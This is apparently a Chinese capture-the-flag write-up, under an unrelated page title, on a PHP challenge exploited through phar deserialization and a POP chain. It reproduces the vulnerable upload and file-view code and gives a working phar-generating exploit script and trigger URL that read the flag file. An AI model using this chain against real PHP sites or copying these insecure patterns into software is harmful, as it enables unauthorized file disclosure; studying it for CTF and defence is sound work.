Backtrader中文筆記之Fillers
阿新 • • 發佈:2020-09-21
- phar反序列化
- pop鏈構造
可以看到,有file引數,猜測可能存在任意檔案讀取
依次讀取
index.php
<?php
// index.php: front page of the challenge; all markup comes from base.php.
header("content-type:text/html;charset=utf-8");
include 'base.php';
?>
base.php
<!-- base.php: shared layout and navigation, pulled in by index.php and by function.php -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>web3</title>
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css">
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script>
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>
    <nav class="navbar navbar-default" role="navigation">
        <div class="container-fluid">
            <div class="navbar-header">
                <a class="navbar-brand" href="index.php">首頁</a>
            </div>
            <!-- the two application entry points: file viewer (?file=) and uploader -->
            <ul class="nav navbar-nav navbra-toggle">
                <li class="active"><a href="file.php?file=">檢視檔案</a></li>
                <li><a href="upload_file.php">上傳檔案</a></li>
            </ul>
            <ul class="nav navbar-nav navbar-right">
                <!-- NOTE(review): echoed without htmlspecialchars(); REMOTE_ADDR is set by the
                     server rather than taken from the request body, so risk is low, but output
                     escaping is the habit to keep -->
                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li>
            </ul>
        </div>
    </nav>
</body>
</html>
<!-- hint left in the page source -->
<!--flag is in f1ag.php-->
upload_file.php
<?php
// upload_file.php: run the upload handler from function.php first, then render the form.
include 'function.php';
upload_file();
?>
<html>
<head>
    <!-- NOTE(review): attribute is misspelled ("charest"), so no charset is declared here -->
    <meta charest="utf-8">
    <title>檔案上傳</title>
</head>
<body>
    <div align = "center">
        <h1>前端寫得很low,請各位師傅見諒!</h1>
    </div>
    <style>
        p{ margin:0 auto}
    </style>
    <div>
        <!-- multipart POST back to this script; field name "file" is what function.php reads -->
        <form action="upload_file.php" method="post" enctype="multipart/form-data">
            <label for="file">檔名:</label>
            <input type="file" name="file" id="file"><br>
            <input type="submit" name="submit" value="提交">
        <!-- NOTE(review): <form> is never closed, and the </script> below has no opening tag -->
    </div>
    </script>
</body>
</html>
function.php
<?php
//show_source(__FILE__);
include "base.php";
header("Content-type: text/html;charset=utf-8");
// Silences every notice/warning for this request — and, because file.php includes this file,
// for the file viewer as well.
error_reporting(0);

/**
 * Stores the uploaded temp file as upload/<md5(original name . client IP)>.jpg and reports success.
 * NOTE(review): the stored name is derived only from values the uploader already knows (its own
 * filename and IP), so the resulting URL is predictable; a random name, or storage outside the
 * web root, would avoid serving uploads at a guessable location.
 */
function upload_file_do()
{
    global $_FILES; // redundant: $_FILES is a superglobal
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg";
    //mkdir("upload",0777);
    // NOTE(review): existence is checked under upload/ but unlink() receives the bare name,
    // so it targets the current directory instead — looks like a missing "upload/" prefix.
    if(file_exists("upload/" . $filename)) {
        unlink($filename);
    }
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);
    echo '<script type="text/javascript">alert("上傳成功!");</script>';
}

/**
 * Entry point called by upload_file.php: store the file only if the extension check passes.
 */
function upload_file()
{
    global $_FILES;
    if(upload_file_check()) {
        upload_file_do();
    }
}

/**
 * Extension allow-list (gif/jpeg/jpg/png) applied to the client-supplied filename.
 * Returns true or false, or nothing at all (null, which the caller treats as false)
 * when the filename has no extension.
 * NOTE(review): only the text after the last "." is compared (non-strict in_array); the
 * file's bytes are never inspected, so the check says nothing about the actual content.
 */
function upload_file_check()
{
    global $_FILES;
    $allowed_types = array("gif","jpeg","jpg","png");
    $temp = explode(".",$_FILES["file"]["name"]);
    $extension = end($temp);
    if(empty($extension)) {
        //echo "<h4>Please choose a file to upload:" . "<h4/>";
    }
    else{
        if(in_array($extension,$allowed_types)) {
            return true;
        } else {
            echo '<script type="text/javascript">alert("Invalid file!");</script>';
            return false;
        }
    }
}
?>
file.php
<?php
// file.php: displays the file named by ?file= through Show::_show().
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
// Confines filesystem access to the web root (which is why the writeup uses absolute
// /var/www/html/ paths).
ini_set('open_basedir','/var/www/html/');
// NOTE(review): $_GET["file"] is read before checking that it exists — an undefined-index
// notice when the parameter is absent (masked by error_reporting(0) from function.php);
// `$_GET['file'] ?? ""` avoids it.
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {
    echo "<h2>There is no file to show!<h2/>";
}
// NOTE(review): Show::__construct declares a required $file parameter; calling it with no
// argument is a warning on PHP 7.0 (hidden by error_reporting(0)) but throws
// ArgumentCountError on PHP >= 7.1.
$show = new Show();
// file_exists() runs on the raw, unfiltered parameter; the wrapper/path blocklist lives in
// _show() and is only consulted afterwards. NOTE(review): rejecting any "://" scheme here,
// before file_exists(), would close that ordering gap.
if(file_exists($file)) {
    $show->source = $file; // declared public property, so Show::__set is not involved
    $show->_show();
} else if (!empty($file)){
    die('file doesn\'t exists.');
}
?>
class.php
<?php
/**
 * C1e4r: holds a value in $str and echoes it when the object is destroyed.
 */
class C1e4r
{
    public $test;
    public $str;

    /** Stores $name in $str; $test stays null until destruction. */
    public function __construct($name)
    {
        $this->str = $name;
    }

    /**
     * Copies $str into $test and echoes it. If $str holds an object, echo
     * invokes that object's __toString().
     */
    public function __destruct()
    {
        echo $this->test = $this->str;
    }
}
/**
 * Show: displays a source file after a path/wrapper blocklist check in _show().
 * Its magic methods are what the writeup chains together: __toString() dereferences
 * $str['str']->source, __set() permits dynamic properties, and __wakeup() re-checks
 * $source after unserialize().
 */
class Show
{
    public $source;
    public $str;

    public function __construct($file)
    {
        $this->source = $file; //$this->source = phar://phar.jpg
        echo $this->source;
    }

    /**
     * Reads ->source on whatever object sits in $str['str']. When that object declares no
     * `source` property (as Test does), PHP calls its __get('source') instead.
     */
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }

    /**
     * Writes to undeclared properties land here and create them dynamically
     * (assignments to the declared $source/$str never reach this method).
     */
    public function __set($key,$value)
    {
        $this->$key = $value;
    }

    /**
     * Blocklist on the path (remote/stream wrapper names, "..", the flag file name),
     * then syntax-highlights the file.
     * NOTE(review): "phar" is absent from this list, and in file.php file_exists() is
     * applied to the path before _show() is ever reached.
     */
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
    }

    /**
     * Runs after unserialize(). Only $source is inspected (not $str), and this copy of the
     * blocklist omits the "f1ag" entry present in _show().
     */
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
/**
 * Test: resolves a key through $params to a path and returns that path's contents
 * base64-encoded. Any read of an undeclared property is routed through __get().
 */
class Test
{
    public $file;
    public $params;

    /** Starts with an empty parameter map; $file is left unset. */
    public function __construct()
    {
        $this->params = [];
    }

    /** Magic accessor: `$obj->anything` (undeclared) becomes get('anything'). */
    public function __get($key)
    {
        return $this->get($key);
    }

    /**
     * Looks $key up in $params, falling back to "index.php", and returns the
     * base64-encoded contents of that path.
     */
    public function get($key)
    {
        $path = $this->params[$key] ?? "index.php";
        return $this->file_get($path);
    }

    /** Reads $value with file_get_contents() (stream wrappers honoured) and base64-encodes it. */
    public function file_get($value)
    {
        return base64_encode(file_get_contents($value));
    }
}
?>
Test類
new Test() -> params[] -> __get($key) 訪問不存在或不可訪問屬性時觸發 -> get($key)
-> params[$key]= '/var/www/html/f1ag.php'; -> file_get('/var/www/html/f1ag.php') -> return
Show類
存在 __toString() 方法,在 $a = new Show(); echo $a; 時被呼叫
source屬性在Test類中不存在,讓Test類訪問這個屬性即可呼叫__get()方法
C1e4r類
存在echo $this->test;
$a = new Show();
$b = new C1e4r($a);
最後生成phar檔案
<?php
// Generator for the phar file used in the writeup. The three classes are property-only
// stand-ins for the target's classes (serialize() records only class names and property
// values, so methods are not needed); they are wired into the C1e4r -> Show -> Test chain
// described above and stored as phar metadata.
class C1e4r
{
    public $test;
    public $str;
}
class Show
{
    public $source;
    public $str;
}
class Test
{
    public $file;
    public $params;
}
$test = new Test();
$test->params['source'] = '/var/www/html/f1ag.php'; // absolute path, as given in file.php
$show = new Show();
$show->str['str'] = $test;
$c1e4r = new C1e4r();
$c1e4r->str = $show;
$phar = new Phar("exp.phar"); // .phar file
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); // fixed stub (the "? >" is most likely a rendering artefact of "?>")
$phar->setMetadata($c1e4r); // the chain is entered through C1e4r, so a C1e4r object is stored
$phar->addFromString("exp.txt", "test"); // arbitrary content so a signature is produced
$phar->stopBuffering();
?>
因upload_file.php做了白名單限制,故將exp.phar檔案改成exp.jpg檔案上傳
訪問upload目錄,發現可直接讀取檔案
上傳之後,確定檔名,進行讀取
file.php?file=phar://upload/234c26003f1b29dee60153f4039eea59.jpg
參考
https://www.cnblogs.com/h3zh1/p/12712426.html